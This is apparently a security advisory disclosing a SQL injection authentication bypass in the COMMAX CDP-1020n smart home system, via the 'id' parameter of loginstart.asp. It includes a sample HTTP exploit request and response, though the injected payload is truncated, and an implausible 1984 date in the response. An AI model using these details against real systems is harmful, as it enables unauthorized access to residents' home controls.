COMMAX Smart Home IoT Control System CDP-1020n SQL Injection Authentication Bypass  
Vendor: COMMAX Co., Ltd.  
Prodcut web page:  
Affected version: CDP-1020n  
481 System  
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment  
complex that provides advanced life values and safety.  
Desc: The application suffers from an SQL Injection vulnerability. Input passed  
through the 'id' POST parameter in 'loginstart.asp' is not properly sanitised  
before being returned to the user or used in SQL queries. This can be exploited  
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication  
Tested on: Microsoft-IIS/7.5  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2021-5662  
Advisory URL:  
POST /common/loginstart.asp?joincode={{truncated}} HTTP/1.1  
Host: localhost  
Connection: keep-alive  
Content-Length: 37  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://localhost/mainstart.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: {}  
HTTP/1.1 200 OK  
Cache-Control: private  
Content-Length: 621  
Content-Type: text/html  
Server: Microsoft-IIS/7.5  
Set-Cookie: {}  
X-Powered-By: ASP.NET  
Date: Tue, 03 Aug 1984 22:57:56 GMT